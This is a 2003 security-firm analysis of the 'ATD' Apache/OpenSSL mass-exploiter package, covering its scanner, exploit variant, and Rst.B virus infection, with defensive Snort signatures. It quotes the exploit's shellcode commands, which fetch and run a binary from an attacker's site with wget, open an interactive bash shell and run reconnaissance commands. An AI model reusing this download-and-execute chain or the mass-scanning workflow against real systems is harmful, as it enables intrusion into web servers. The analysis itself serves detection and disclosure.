Contact Us
Analysis of the ATD OpenSSL Mass Exploiter
- URL: http://www.secureworks.com/research/threats/atd
- Date: April 7, 2003
- Author: Joe Stewart
Introduction
This paper offers a brief analysis of an Apache/OpenSSL mass exploiter found in the wild. In recent history many people have inquired in public forums as to the origin and functionality of this particular exploit. LURHQ Threat Intelligence Group has taken steps to track the origin and define the functionality of this exploit. What we found is that there are at least two distinct tools scanning the Internet using the same HTTP GET request, in the course of the same exploit. For one tool the source code is available. The other is available as a binary only, and is the tool we chose to analyze for this paper.
ATD – Mass Exploiter
We chose the term mass exploiter rather than autorooter, primarily because the software is not fully automated, and when run does not yield a root shell. It is however a powerful engine for mass-hacking webservers, and is quite dangerous due to the wide number of Linux distributions it can compromise in a single run. We have prefixed it with the name ATD simply because that is the name of the tar archive in which it is packaged. We have chosen not to do an in-depth analysis of the authors affiliation with any particular hacking group; however suffice it to say the origin of the package and at least one of the authors is Romania, and there are several hacking groups from that country currently defacing countless Linux-hosted websites worldwide. This mass exploiter may be at the root of that activity.
Here are the details of the package:
Filename: atd.tgz Size: 67,538 bytes Md5sum: 66d49e2bd0c810adb0ef6b275bf5769c
Files contained in the package:
drwxr-xr-x 500/500 0 2002-11-21 05:57:55 atd/ -rwxr-xr-x root/root 30971 2002-11-20 00:02:19 atd/mass -rwxr-xr-x root/root 27702 2002-11-20 02:47:40 atd/osslmass2 -rwxr-xr-x root/root 23424 2002-11-21 05:57:57 atd/vuln -rwxr-xr-x root/1001 124850 2002-11-21 05:46:53 atd/openssl-too
Md5sums of files inside the package:
c81b35baa84d9468536522c729498403 mass 4d92ff9b27ffcb5acdd5162d847a9546 openssl-too 2b7d8b805512d6c7331bdbc38b647690 osslmass2 c6cb9fe3eaae673c880cf2b8461368f7 vuln
Virus Warning
At this point it should be mentioned that all the files in this package are infected with the Linux/Rst.B virus. If you run these files on your system all the executable files in the same directory will be infected. If you make the mistake of running them as root, files in your /bin directory will also be infected. Although the payload is not as bad as it could be, this virus opens up a backdoor on your system, so if you obtain copies of the files described here for further analysis, treat them with caution. We will not be providing the files or links to them in this paper, but disassembly with string data is provided in the file section toward the end of this analysis.
File Functions and Characteristics
mass – This is the scanner component. It launches into the background, saving its process id in “mass.pid”. Given a range of IP addresses, it will attempt to connect to each one on tcp port 443. If a listening server is found, it will then connect on port 80 and try to determine the server version from the HTTP headers. It saves information in “mass.log” about each host it finds.
When run, the program gives the following usage output:
: Mass scanner - by Silviu : This is an SSL IP scanner that can be placed into background : it keeps logs of each ip found, and the apache/*nix version USAGE: ./mass [OPTIONS] <ip-mask> The <ip-mask> is the class to scan (eg: 192.168.1.* 192.168.*.* 192.*.*.*) The options are: -p --port=<#> - the port to check (default 443) -s --sockets=<#> - # of sockets to use (default 300) -t --connect-timeout=<#> - connect timeout in seconds (default 10) -T --receive-timeout=<#> - receive timeout in seconds (default 40) -l --log=<file> - log file (default mass.log) -b --background - fall into background -c --clean-log - log only the ips. -h --help - display this help and exit. Examples: ./mass 192.168.0.1 ./mass 192.168.10.* --sockets=100 ./mass 192.168.*.* -s 200 --background ./mass 192.*.*.* -s 800
Here is tcpdump output of the request on port 80:
11:26:20.494868 192.168.1.2.38735 > 192.168.1.8.80: P 1:27(26) ack 1 win 5488 <nop,nop,timestamp 52028296 4220465> (DF) 0x0000 4500 004e 819f 4000 4006 35b0 c0a8 0102 E..N..@.@.5..... 0x0010 c0a8 0108 974f 0050 dfc3 6216 79e8 9783 .....O.P..b.y... 0x0020 8018 1570 4da6 0000 0101 080a 0319 e388 ...pM........... 0x0030 0040 6631 4745 5420 2f73 756d 7468 696e .@f1GET./sumthin 0x0040 2048 5454 502f 312e 300d 0a0d 0a00 .HTTP/1.0.....
The scanned host would have a request similar to the following logged in its httpd access log:
www.example.com xxx.xxx.xxx.xxx - - [04/Apr/2003:13:44:28 -0500] "GET /sumthin HTTP/1.0" 404 282 "-" "-"
One can only speculate as to why the author of the scanner used such an identifiable trademark when a simple “HEAD /” or “GET /” would have achieved the same result while blending in with the ordinary requests a webserver might see.
openssl-too – This is the actual exploit, a variant of the “openssl-too-open” exploit by Solar Eclipse. For all intents and purposes, it is the same exploit code, except the output has been translated to Romanian, the authorship line has been changed, and the command line downloads and runs the an executable from the packager's site before launching a shell.
: OpenSsl Exploit ... Folositi-l Pe Riscul Vostru
by Silviu <Silviu@Silviu.ph>
Folosire: ./openssl-too [Optiuni] <host>
-a <arch> Arhitecturã (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> Numãr Minim De Conexiuni (default is 30)
-m <N> Numãr Maxim De Conexiuni (default is 50)
-v Verbose Mode
Arhitecturi:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
Example: ./openssl-too -a 0x01 -v localhost
./openssl-too -p 1234 192.168.0.1 -c 40 -m 80
The shellcode executes the following commands as the apache user on the victim host:
TERM=xterm cd /tmp/ wget -dbc silviu.250free.com/x/qd >>/dev/null sleep 8 rm -rf wget* chmod +x qd ./qd >>/dev/null rm -rf /tmp/qd export TERM=xterm exec bash -i
The site in the wget command above has already been deleted, so we are unable to say for sure what the “qd” binary does. However, it is fairly likely that it is the server component of the “Q” trojan by Mixter. For more information, see the analysis of Q by Craig Baltes.
After downloading and launching qd, the exploit forks an interactive bash shell as does the standard openssl-too-open exploit. However, in this shell five more commands are run automatically to gather system info before releasing interactive control to the attacker. This also deviates from the normal openssl-too-open behavior. The commands are as follows:
uname -a cat /etc/issue cat /etc/*-release id w
At this point the attacker would likely download a local root exploit from another compromised system and fully own the box.
osslmass2 – This program reads mass.log and runs openssl-too with the proper arguments against all the vulnerable hosts listed. An attacker can run the “mass” program, leave, come back hours later and run this program to gain access to host after host with no real effort.
Usage output is as follows:
: osslmass2.c - by Inkubus, the credits goes to Solar Eclipse and Phill : osslmass2 tries to exploit a `mass.log' and attacks vulnerable IPs USAGE: ./osslmass2 <log-file>
vuln – This program reads mass.log and prints out vulnerable hosts.
: vuln.c - by Silviu : vuln analizes a `mass.log' and displays the vulnerable IPs : and the server version USAGE: ./vuln <log-file>
IDS Signatures
We have written the following Snort signature to detect the scanner:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC OpenSSL-Mass scan"; flow:to_server,established; content:"GET /sumthin HTTP/1.0"; offset:0; depth:21; classtype:attempted-recon; reference:url,www.secureworks.com/research/threats/atd; sid:1000001; rev:1;)
The following Snort signature has been part of the default Snort ruleset for several months and will detect a successful attack from this exploit or any of the other existing worms/exploits that utilize the openssl-too-open.c code as a base:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 443 (msg:"MISC OpenSSL Worm traffic"; flow:to_server,established; content:"TERM=xterm"; nocase; classtype:web-application-attack; reference:url,www.cert.org/advisories/CA-2002-27.html; sid:1887; rev:2;)
Although Rst.b is not the primary focus of this paper, we have developed Snort signatures for it as well, because the standard Snort rulebase is lacking any signatures for this backdoor which has been widely deployed for over a year.
This Snort signature will alert when someone scans your network looking for Linux/Rst.b infected hosts:
alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"BACKDOOR Linux/Rst.b Scan"; dsize: <9; content:"|44 4f 4d 02|"; depth:4; classtype:attempted-recon; reference:url,www.secureworks.com/research/threats/atd; sid:1000002; rev:1;)
This Snort signature will alert when a remote host attempts to run a shell command using the Rst.b backdoor, whether the remote host is actually infected or not:
alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"BACKDOOR Linux/Rst.b Shell Command"; content:"|44 4f 4d 01|"; depth:4; classtype:misc-activity; reference:url,www.secureworks.com/research/threats/atd; sid:1000003; rev:1;)
This Snort signature will alert when a host on your network replies to a scan for Linux/Rst.b, indicating an infection:
alert udp $HOME_NET any -> $EXTERNAL_NET 4369 (msg:"BACKDOOR Linux/Rst.b Reply"; content:"DOM"; dsize:3; classtype:misc-activity; reference:url,www.secureworks.com/research/threats/atd; sid:1000004; rev:1;)
The signatures above are only for Snort version 1.9 and above.
Analysis Files
Disassemblies of the binaries were made using dasm. The binaries were first cleaned of the Rst.b virus so they could be analyzed in their original state. The dasm output files are available here:
http://www.secureworks.com/research/threats/atd/mass.dasm.txt
http://www.secureworks.com/research/threats/atd/openssl-too.dasm.txt
http://www.secureworks.com/research/threats/atd/osslmass2.dasm.txt
http://www.secureworks.com/research/threats/atd/vuln.dasm.txt
Source code for the files in this package is not known to be publicly available except for openssl-too, which is really openssl-too-open.c with a few minor changes.
Summary
This is a fairly simple but powerful exploit package, which is probably responsible for mass defacements of Linux-hosted websites worldwide. Although it only provides a shell as the apache user, it might as well be a remote root exploit due to the existence of the ptrace local root exploit which works on every platform this exploit targets. The fact that it is infected with the Rst.b virus also makes it a somewhat bigger threat.
It is unknown why the files are infected with the Rst.b virus, but all copies of this package we have found in the wild were infected. The script kiddies who use this package probably do not know it is infected and it is likely infecting all their other tools as well. The Rst.b virus may leave a backdoor running on systems it infects, but not always. This is something that the two Rst.b analyses referenced below have overlooked. In order for the backdoor to be activated, the virus must be run as root and the infected system must not be using devfs. This is because devfs causes file creation in the /dev directory to fail with “permission denied”. When the virus is unable to create the files /dev/hdx1 and /dev/hdx2 it exits before starting the backdoor code. However, since many of the exploit targets do not use devfs by default, it is probable that the author of Rst.b has gained potential root access on tens of thousands of systems over the past year and a half using the work of oblivious lower-level script-kiddies.
References
“CERT® Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL.” http://www.cert.org/advisories/CA-2002-23.html. July 30, 2002.
Baltes, Craig. “Re: Covert Channels”. http://lists.jammed.com/pen-test/2002/10/0027.html. October 17, 2002.
Baltes, Craig. “GCIA Practical Assignment.” http://www.giac.org/practical/GCIA/Craig_Baltes_GCIA.doc. October 11, 2002.
Eclipse, Solar. “openssl-too-open.c.” http://packetstormsecurity.nl/filedesc/openssl-too-open.tar.html. September 17, 2002.
Lee, Chia Ling. “Port 443 and Openssl-too-open.” http://www.giac.org/practical/GCIH/Chia_Ling_Lee_GCIH.pdf. November 29, 2002.
Lockdown. “RST-variant analysis.” http://www.lockeddown.net/rst-expl.txt. December 19, 2001.
“Qualys Security Alert QSA-2002-01-01 Remote Shell Trojan b (RST.b).” http://www.qualys.com/alert/QSA-2002-01-01.pdf. January 9, 2002.
